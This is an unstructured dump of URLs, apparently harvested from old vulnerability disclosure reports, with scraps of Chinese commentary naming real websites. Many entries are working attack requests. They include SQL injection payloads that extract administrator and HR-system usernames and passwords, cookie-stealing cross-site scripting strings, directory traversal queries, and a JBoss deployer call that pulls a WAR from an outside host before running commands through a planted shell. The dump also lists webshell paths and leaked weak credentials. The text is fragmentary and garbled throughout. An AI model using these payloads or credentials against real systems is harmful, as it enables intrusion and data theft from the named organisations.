http://www.njxt.net:8000/ashx/download.ashx?/ashx/SaveFile.ashx http://**.**.**.** http://**.**.**.**:8080/wcm/comm_fron http://www.sinoess.com/ http://www.sinoess.com/loginAction!redirect.action http://www.sinoess.com/con1.jsp http://www.yunbaoxiao.net:80/resetEmailPwd?username=&start= http://www.yunbaoxiao.net/login http://www.yunbaoxiao.net:80/resetEmailPwd?username=d2Vpd2FuZ0BjcmVkaXRlYXNlLmNu&start=MjAxNS0xMi0xNCAxNzowNzo0Mg== http://**.**.**.**/album/albumBefAction?doit=show&mbr_no=331161&no=307044 http://www.vcangene.com/vcangene/site.jsp http://118.193.11.70 http://host/homepage.php/账号/member-profile http://**.**.**.**/homepage.php/admin/member-profile http://**.**.**.**/syportal/login http://**.**.**.**/syportal/login http://m.ac.qq.com/ http://pan.baidu.com/s/1sjSuQwl http://**.**.**.**/News/news.aspx?id=1%27 http://cemftp.ce-air.com/yyoa/index.jsp http://dealer.xcar.com.cn/dealerdp_index.php?r=inner/DealerApp/GetSmsPwd/uname/15812448662/security/abc1214567/type/3 http://www.daojia.com.cn/restaurant.php?a=53&r=3657 http://**.**.**.**/Home/Search?keywords=1 http://218.58.70.201:8080/haier http://218.58.70.201:8080/ http://202.104.30.113:8000 http://202.104.30.113:8000/uddiexplorer/发现存在uddi,尝试了下ssrf内网的嗅探 http://202.104.30.113:8000/uddiexplorer/SetupUDDIExplorer.jsp页面泄露了内网的地址段,试起来 http://**.**.**.**/teachwebsl/login.aspx http://218.241.131.229/dcwork/ http://218.241.131.229/invoker/JMXInvokerServlet直接部署shell http://218.241.131.229/is/index.jsp http://oa.bjgold.com.cn http://oa.bjgold.com.cn//pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://kh.gw.com.cn/ http://111.203.203.24:8080/WebContent/addECPolicy/kuaisutoubao.jsp http://111.203.203.24:8080/ ROOT.WAR/shell.jsp http://111.203.203.24:8080/she11.jsp http://111.203.203.25:8080/WebContent/addECPolicy/kuaisutoubao.jsp http://111.203.203.25:8080/she11.jsp http://git.csdn.net/ http://hr.hitsz.edu.cn/rsc/infoDetail.php?id=471 http://www.cnsportslottery.cn/ www.cnsportslottery.cn 
http://www.cnsportslottery.cn http://**.**.**.**/main1.action,如图: http://www.gzxijiu.cn:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://122.224.86.103/index.jsp https://mail.sunyard.com http://oa.sunyard.com.cn/seeyon/main.do http://**.**.**.**/system/userPurview/toLogin http://**.**.**.**/portal/index.php?c=main&a=index&t=0&menuId=1&id=1&mpId=1 http://www.huinet.cn/ http://www.pzyuebao.com/是个小网站,搞篮球培训的,相对好挖。 http://www.10quan.cn/ http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon/ http://**.**.**.**:8888/jwgkweb/zdgk/zdgk!view.do?jwZdid=402894924a6660ca014a66942910000c http://**.**.**.**:8888/ fce8:8b46:86c4%15]:3343 ae62:9a07:da05%15]:49253 fce8:8b46:86c4%15]:49870 a91d:84fd:f67a:7306%15]:3343 http://61.155.167.220:843/ http://61.155.167.220/test.php http://zone.wooyun.org/content/23858写crontab http://***.***.***.***/shell.txt http://61.155.167.220/xiao.php J.......tion/x-m http://**.**.**.**/NewsDetail.asp?id=166 http://**.**.**.**/VideoSType.php?from=top10&BNum=1&SNum=2 http://**.**.**.**/frontend/fl/1/index.php?HotelID=513 https://**.**.**.**:8443/cas/login?service=http%3A%2F%2F**.**.**.**%3A8080%2Fportal%2F https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13,如图: https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 redirect:/xxoo=-1 https://**.**.**.**/eServicePublic/xxoo http://**.**.**.**/bugs/wooyun-2015-0154054 http://**.**.**.**/product_list.php?k_id= http://cec.neu.edu.cn/MHSys/secindex.do?method=trainSystemQuery&sid=7&queryCode=PX_ZSCX http://www.rqzhzh.net/admin.php http://**.**.**.**/ http://**.**.**.**/user_register.jsp http://**.**.**.**/product_list.php?c1=5 http://**.**.**.**/TemplateMSG.php?TypeNO=4 http://**.**.**.**/bugs/wooyun-2015-0157039 http://115.182.79.221:8080/ http://115.182.79.221:8080/cacti/ http://115.182.79.221:8080/wordpress/ http://115.182.79.221:8080/wordpress/wp-login.php 
http://app.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D http://app.cjn.cn/data/mysql_error_trace.inc http://app.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://app1.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D http://app1.cjn.cn/data/mysql_error_trace.inc http://app1.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://app1.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://byby.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://hbjs.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://it.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://jkys.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://lady.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://life.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 
http://pinyou.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://wh2049.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://yazg.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://yy.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://e.cjn.cn/upload.jsp http://e.cjn.cn/image.jsp http://jkys.cjn.cn/ http://XXX.**.**.**.**/webcast/ http://www.17xuexi.com/reg/reg3.asp?jz_ok=&username=admin http://www.17xuexi.com/new_web/my_info_1.asp http://www.17xuexi.com/myclass/ http://www.17xuexi.com/lipin/ http://www.17xuexi.com/payold/ http://www.17xuexi.com/laoshi/laoshi.asp http://www.17xuexi.com/jiazhang/default.asp http://www.17xuexi.com/mx.asp http://m.ruijie.com.cn/.svn/entries http://m.ruijie.com.cn/ruijie/video/play.html?ID=429&UID=CE105824-31EC-47DA-BFF5-FACD6C1254C1 https://**.**.**.** https://**.**.**.**/cplectures/include/getfile.php?file=getfile.php&filepath=../include&filename=getfile.php https://www.batiaoyu.com/stc-cooperation.htm这个页面中,我们发现有一个邮箱 http://211.144.154.230/loginSystem.action http://**.**.**.**/mmbiz/RQcjyciayU2eMbzzanf7zM7eqlekmibm5KUr7aRzxaBSkZBIMJzexcib303Exx8aahPH35Jn7nMUbqiakIPHP0UGUw/0 http://**.**.**.**/news/news.php?id=4775 http://121.34.253.167:7001/ http://club.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://m.sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp 
http://www.sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://account.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://pvi.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.** http://**.**.**.**:8011 http://www.gsrjr.com/new.asp?id=334 http://**.**.**.**/anwz/index/index.jhtml中的标识链接 http://211.162.119.43/ http://www.sanyaairport.com/ http://www.sanyaairport.com/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.sanyaairport.com/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.greenet.net.cn/news.php?id=142 http://218.203.132.116/taixi/article.do?articleID=35894 http://218.203.132.116/taixi/channel.do?id=60062 http://m.jinjiang.com/ http://oa.tianjimedia.com/yyoa/ http://oa.tianjimedia.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.19ued.com/yaojiu/wp-login.php http://jjrtt.com/ http://202.96.126.246:8080/invoker/JMXInvokerServlet http://**.**.**.**/index.php?id=670&m=News&a=detail&showid=208 http://www.oohaney.com/ www.oohaney.com http://**.**.**.**/ http://**.**.**.**/zdsys/Manage https://mail.yueyuedai.com/mm-ms/?module=base&action=login登陆框存在SQL注入 http://www.oschina.net/news/67975/redis-defect?from=mail-notify http://bbs.baozoumanhua.com/forums/1/articles/new http://bbs.baozoumanhua.com/forums/1/articles/388479.json http://www.youzhu.com/Index/forgetPassword http://www.youzhu.com/Index/checkCode http://www.youzhu.com/Index/reg URL:http://**.**.**.**//web/ProvidentFund/list/Listzx.jsp?locationCatalog=147782&catalog=147782&catalogs=147787&catalogHelp=147781&VR_CLASS_ID=147782 http://www.svwstar.com/epss/存在Apache http://**.**.**.**:7001/console/login/LoginForm.jsp http://hr.chinawutong.com/qiuzhi/p1/?p=0%27&pv= hr.chinawutong.com/qiuzhi/p1/?p=0 http://crm.goukuai.cn/auth/login 
http://121.199.3.197/login http://**.**.**.**/ http://koa5.hisense.com/login.jsp;jsessionid=Zs5hWvShfPTJGhJ9zNQ3QFPKKRtq8M692SzgC4gRyGcJwd9pXslN!1123129354 http://www.greenet.net.cn/about.php?id=4 http://www.greenet.net.cn/news.php?id=157 http://www.greenet.net.cn/product.php?id=16 http://www.greenet.net.cn/fangan_xq.php?id=5 http://222.189.156.67:8089/yyoa/ http://222.189.156.67:8089/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://vmi.tclking.com/ http://recruit.svw.cn/recruitment/resume/addresume/person_id/160000/lid/1/job_id/2 http://recruit.svw.cn/recruitment/resume/addresume/person_id/160000/lid/1/job_id/2 http://recruit.svw.cn/recruitment/resume/addresume/person_id/161111/lid/1/job_id/2 http://**.**.**.**/news_list.php?id=5 https://ip:8080到公网,恶意人员使用超级账号telecomadmin http://www.hiersun.com/ http://mys8.super8.com.cn:81/pages/WS/News/WS_NewsManage.aspx http://117.121.52.216:10001/debug/ http://game1-bs.ma.sdo.com:10001/debug/mst/skill/index http://www.ahzsks.cn/Non-Degree7/article.jsp?articleId=164758779 http://**.**.**.**/ http://**.**.**.**/views/content/ContentPage.xhtml?q_content_id=78582&file_num=69682&top_file_num=67336 http://oa.htfutures.com/login/login.jsp http://oa.htfutures.com/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://www.gykgah.com/yyoa/index.jsp http://www.gykgah.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://www.gykgah.com/yyoa/welcome.jsp http://www.gykgah.cn/index.asp http://**.**.**.**/ZChart?classid=1&byclass=true&index=true http://cloud.ruijie.com.cn/rcs/login锐捷云网 http://oa.clypg.com.cn/seeyon/index.jsp http://oa.clypg.com.cn/seeyon/management/index.jsp http://oa.clypg.com.cn/seeyon/logs/login.log http://www.guodadrugstores.com/ http://www.guodadrugstores.com/admin/ http://admonitor.miaozhen.com http://store.hicling.com/ http://www.edufe.com.cn/special/mxxhg2014/galleria.php?catid=191 http://ryadmin.ruijie.com.cn/mxsoft/test.php 
http://**.**.**.**/bugs/wooyun-2014-061903 http://**.**.**.**/chi/product_detail.php?id=14 http://**.**.**.**/index.php?class=3 http://oa.bestv.com.cn http://oa.bestv.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://es01.enet.com.cn/eblog/blog/htm/uid_1*.html http://www.sinopharm-sd.com/ http://www.sinopharm-sd.com/admin/admin_login.aspx http://www.gykgah.cn/ http://www.gykgah.cn/aspnet_client/system_web/ http://www.gykgah.cn/aspnet_client/ http://www.gykgah.cn/data/ http://www.gykgah.cn/images/ http://www.qh168.com.cn:8008/login/Login.jsp?logintype=1 http://www.qh168.com.cn:8008/page/element/news/more.jsp?ebaseid=news&eid=1123 http://www5.nenu.edu.cn/professor/pro/show.php?flag=1&id=228 http://**.**.**.**/plug/oem/AspCms_OEM.asp http://demo.aspcms.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/products_list.php?conid=4 http://**.**.**.**/activity_news_detail.php?Id=1317* http://**.**.**.**/djfile_show.php?Id=23&P=4* http://www.21yod.com/ http://www.21yod.com/jmx-consoleing/ http://www.basismold.com/page/newsinfo.aspx http://**.**.**.**/biz/ http://**.**.**.**/HtmlView.aspx http://**.**.**.**/default.aspx http://**.**.**.**/AdminLogon http://**.**.**.**/imCroePlatform/business_OrderFlow_qryFlowPreview.action http://**.**.**.**:7001/hzgjjweb/ http://**.**.**.**:7001/ma/ http://huishou.dangdang.com/ http://huishou.dangdang.com/User/AddUserAddress http://**.**.**.**/index.php?option=com_contenthistory&view=history&list[select]=1,扔到sqlmap。 http://blog.techweb.com.cn/ http://www.yongche.com/order/info.php?id=订单号 http://whistle.ruijie.com.cn:60022/MS http://whistle.ruijie.com.cn:60022/MS/login.action http://whistle.ruijie.com.cn:60022/MS/88cmd.jsp http://**.**.**.**/news/display.php?id=3502&table=news http://**.**.**.**/news/more.php?part=3 http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2 http://**.**.**.**/product_list.php 
POST:order_by=1*&order_type=*&where=a.PId%3Db.Id&p=88952634&CateId=1&CateId=1&query=8&keyword=8&curr_order=8&order=a.Sortid%20desc http://**.**.**.** http://**.**.**.**/cht/index.php?code=list&flag=detail&ids=56&article_id=436 http://**.**.**.**/YL/dx.action存在命令执行漏洞 http://**.**.**.**/YL/test.jsp密码tom read:0000679559900 read:0000679559900 read:0000679559900 http://bangzhu.feidee.com/index.php/Index/view/id/2/f_id/25/tid/151 http://**.**.**.**/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.web%3AJ2EEApplication%3Dnone%2CJ2EEServer%3Dnone%2Cj2eeType%3DWebModule%2Cname%3D%2F%2Flocalhost%2Fjmx-consoles http://booking.lkkhpg.com//defaultroot/login.jsp http://booking.lkkhpg.com///defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://doc.creditharmony.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.web%3Aj2eeType%3DWebModule%2Cname%3D%2F%2Flocalhost%2Fjmx-console%2CJ2EEApplication%3Dnone%2CJ2EEServer%3Dnone http://123.127.132.35/seeyon//logs/login.log http://123.127.132.35/seeyon/main.do?method=index http://**.**.**.**:7001/bst/ http://**.**.**.** float:righ clear:both http://124.207.220.66/ http://**.**.**.**/ http://doc.creditharmony.cn/ http://**.**.**.** www.bsgl.sh.cn www.gpsisp.com www.gps188.com www.bds188.com http://www.shbeidou.com/ http://www.longone.com.cn/main/users/resetPwd/index.html#ty http://**.**.**.**/NewsArticle.aspx?t=42&n=1233&c=27 http://**.**.**.**/huansongchen/?domain=**.**.**.** http://**.**.**.**/admin/Login.aspx http://**.**.**.**:8080/iker/index.action存在命令执行漏洞 http://bbs.svw-volkswagen.com/jifenshow.php?id=114 http://**.**.**.**/选择企业服务。打开后图中标识链接即存在漏洞 http://www.chinagps.cc/,点击图中标识链接 http://m.chinagps.cc:9999/driverBook/myCar.action存在命令执行漏洞 http://m.chinagps.cc:9999/driverBook/test.jsp密码tom http://**.**.**.** 
http://www.ihetou.com/camp/shequbbstielist.aspx?source=tie&w=e http://59.108.5.29/loginAction!getCookie.action http://**.**.**.**/ http://222.73.45.249/gps/doif/myLogin.jsp http://**.**.**.**/so?key=aa%27&type=1 http://**.**.**.**/Login http://222.92.3.77/ http://bbs.wildstar.com.cn/uc_server/ http://bbs.wildstar.com.cn/uc_server/Cook.php http://**.**.**.**/modules_page.php?class=1&num=4 http://**.**.**.**/ecdomain/framework/cyrsw/index.jsp http://**.**.**.**/,选择房产政务信息网,图中标识链接存在漏洞 https://github.com/ubunhu/autotest/blob/9f42f9ae8c7ade91436941e3528bd99162bf396a/tripmaster_ios/faceback.py http://mp.toutiao.com/login/ http://mp.toutiao.com http://119.29.26.237/sport/report_runner_info_step?user_id=10000&kind_id=2&distance=0.0&cost_time=0&time=1450247477&caloric=0&steps=123456&subtype=0&ver=3.1.1.4.159&client_user_id=10000 http://**.**.**.**/mathematics/wp-login.php admin:1234567 http://www.zzidc.com/main/huodong/whoIsThief.html# http://3d.vw.com.cn/brandworld/homepage.action http://mail.huatu.com http://**.**.**.**/webinfo/ccgp-web/xj_bidding.asp http://myt.cjn.cn/user/login.php http://218.202.130.42:8080/ http://epa6.enet.com.cn http://**.**.**.**/ http://bbs.touna.cn/list-22/detail-118154.html http://123.127.246.34/phpmyadmin/ http://120.24.181.120/borrow.do http://124.95.164.162:8090/ http://xietong.kingdee.com:7890/ http://xietong.kingdee.com:7890/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://mockup.itjuzi.com:80/ http://**.**.**.**/tv/dis.php?id=363 http://mockup.itjuzi.com:80/location?id=-9414 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:1723/yyoa/ http://**.**.**.**:1723/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://**.**.**.**/bugs/wooyun-2010-0128322 http://**.**.**.**:1723/yyoa/welcome.jsp http://**.**.**.**/wp-login.php siuyinyin:12345678 http://**.**.**.**/ http://www.17tx.com/faw/news_board.php?id=2738存在IDGET类型注入。 
http://**.**.**.**/htm/product_list.php?type=1 http://mailserver.juneyao.com http://**.**.**.**/tw/ http://www.jfdwy.com/item/?c-5,key-1%27.html http://www.bqjujia.com/Item/?c-5,key-1%27.html http://www.gzisc.com.cn/item/?c-5,key-1%27.html http://www.jzlj.org.cn/item/?c-5,key-1%27.html http://www.jinlaima.com/Item/?c-5,key-1%27.html http://jiadewd.com/Item/?c-5,key-1%27.html http://www.recende.com/item/?c-5,key-1%27.html http://www.gdtgw.cn/item/?c-5,key-1%27.html http://www.gmshouji.com/Item/?c-5,key-1%27.html http://210.47.176.3/page/depart/yjsy/item/?c-5,key-1%27.html http://www.jdznj.com/item/?c-5,key-1%27.html http://www.lcsflw.com/item/?c-5,key-1%27.html http://www.cdsyz.com/item/?c-5,key-1%27.html http://www.cqgmy.cn/item/?c-5,key-1%27.html http://www.njyhx.com/item/?c-5,key-1%27.html http://www.hecelaw.com/item/?c-5,key-1%27.html http://www.lsjrd.gov.cn/item/?c-5,key-1%27.html http://www.lfkj.org.cn/item/?c-5,key-1%27.html http://www.qdzhijia.com/item/?c-5,key-1%27.html http://www.gushiyouth.org.cn/item/?c-5,key-1%27.html http://www.xxqzgzb.gov.cn/item/?c-5,key-1%27.html http://www.hnxddq.cn/item/?c-5,key-1%27.html http://www.recende.com/item/?c-5,key-1%27.html http://www.xfwang.cn//item/?c-5,key-1%27.html http://www.ctyygs.com//item/?c-5,key-1%27.html http://www.lcsflw.com//item/?c-5,key-1%27.html http://www.yqhy.gov.cn//item/?c-5,key-1%27.html http://www.cqgmy.cn//item/?c-5,key-1%27.html http://www.sxpsxx.com/item/?c-5,key-1%27.html http://www.xtss.com.cn//item/?c-5,key-1%27.html http://www.jxdjw.gov.cn//item/?c-5,key-1%27.html http://www.srxdx.com/item/?c-5,key-1%27.html http://www.dggraduate.com//item/?c-5,key-1%27.html http://www.dfttkf.com//item/?c-5,key-1%27.html http://www.jdznj.com//item/?c-5,key-1%27.html http://dealer.youxinpai.com http://www.cer.sdu.edu.cn/cq/guest.php http://125.35.22.15/ http://222.73.243.130:9000//jmx-console/ system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war 
http://222.73.243.130:9000/is/cmd.jsp?pwd=023&cmd=netstat%20-an http://oa.baofoo.net/ http://gf.955s.cn:9000/ http://122.224.69.106:9000/manage/user/user_login_.action https://**.**.**.**/control/main.action http://www.umpay.com/WEB-INF/web.xml http://**.**.**.**/ProMgrTH/viewAddEnter.action http://irer.shufe.edu.cn/ http://**.**.**.**/site/news/title_c/index.php?Company_SN=21779&PHPSESSID=msn2089luncua5u8tu8o570ki2 URL:http://**.**.**.**/ http://www.5757car.com/review.php?id=165 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_smsy/PEFundService.getHowBuyData?page=1&num=10&sort=jjjz*&asc=0&ccode=&date=&month= http://**.**.**.**/ http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/big5/news.asp?kind=1 http://extplat.minanins.com/console/login/LoginForm.jsp http://extplat.minanins.com/jmxroot/jmxroot.jsp http://cdcs.gwmdms.com/ ROOT.war/shell.jsp http://cdcs.gwmdms.com:8080/shell.jsp http://**.**.**.**/ http://211.148.197.137/CUTVCloudMS/desktop/desktopAction.do http://mockup.itjuzi.com:80/company/foreign?prov=-3922 http://222.73.243.227/word/wp-admin/ http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 
http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://www.joinbuy.eu/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://joinbuy.de//ajax.php?act=check_field&field_name=user_name&field_data=1%275 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**:88/groupon//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/mei/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://www.3kloan.com/login.do?method=xdcp&yid=18&cid=1 http://222.73.243.217/ http://222.73.243.133//.svn/entries http://www.ytzq.com/main/index.shtml https://service.ytzq.com/service/cgi-bin/ytzq/cfzj/sso/action/LoginAction?function=login http://account2.gongfubb.com/home/admin/?ACT=AC 
http://account2.gongfubb.com/home/admin/UserInfo.php?UID=-37171694%20UNION%20SELECT%201,user%28%29,database%28%29,4,5,6,7,8,9,10,11,12 http://account2.gongfubb.com/home/admin/PayQuery.php?OTI=201512140846302252P11 http://job.e21.cn/dyyh/存在弱口令admin/admin,泄露部分用户信息,同时发现存在更多明文弱口令 http://**.**.**.**/malie/news.asp?y=2015 http://210.14.78.115/是天天果园的网站 http://210.14.78.115/ http://210.14.78.115//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://210.14.78.115//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://**.**.**.**/ns/weblogic/920/domain xmlns:sec="http://www xmlns:wls="http://**.**.**.**/ns/weblogic/90/se xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLoca http://**.**.**.**/ns/weblogic/90/security/wls http://**.**.**.**/ns/weblo http://**.**.**.**/ns/weblogic/920/domain http://www.bea http://**.**.**.**/ns/weblogic/90/security/xacml http://**.**.**.**/ns/weblogic/90/security/xacml.xsd http://**.**.**.**/ns/webl http://**.**.**.**/ns/weblogic/90/security.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/ns/weblogic/90/security/xac xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://**.**.**.**/ns/weblogic/90/security/xacm xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name http://hq.fruitday.com:88/ http://hq.fruitday.com:88///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource 
http://**.**.**.**/SB/news.asp?news=scholarship http://k.yiban.cn/index.php?c=useredit&a=studentdata http://cert.chemao.com.cn/ http://www.chemao.com.cn/index.php?app=showcert&car_id=953334 http://118.122.88.90:60465//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://118.122.88.90:60465//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://shfilmds.com/index.php/cn/ http://**.**.**.**/Login.do?ReturnUrl=%2fDefault.do http://**.**.**.**/index.php/admin/index/login.html http://www.mse.zjut.edu.cn/ShowNewsPageAction.do?newsID=3338&smallClassID=55&bigClassID=2 www.cofco-property.cn/iframe.aspx?id=1* http://**.**.**.**/site/news/title_c/detail.php?Company_SN=21779&Site_News_SN=4779&PHPSESSID=9nej773dctv9mttsq0p18gva43 http://**.**.**.**:8080/SitcHR/存在Jboss反序列化漏洞。 http://111.205.44.70/app/userlogin.jsp http://60.190.113.69 http://**.**.**.**/, http://postdoctorold.ecnu.edu.cn/admin/login.aspx http://**.**.**.**/thread-264895-1-1.html http://**.**.**.** http://**.**.**.**/MobileService_tourism/manager/login_submit.asp http://**.**.**.**/bugs/wooyun-2010-0143537) http://carlife.vcyber.com http://www.ykinns.com:80/ www.ykinns.com http://hdzx.g.yy.com/activitysys/detail?act=peiwan jwgl.ujn.edu.cn/service.asmx文件中的webservice接口GetStuCheckinInfo http://www.zf_webservice.com/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ xmlns:tns="http://tempuri.org/ xmlns:types="http://tempuri.org/encodedTypes xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://**.**.**.**/ http://richina.com.cn/ 
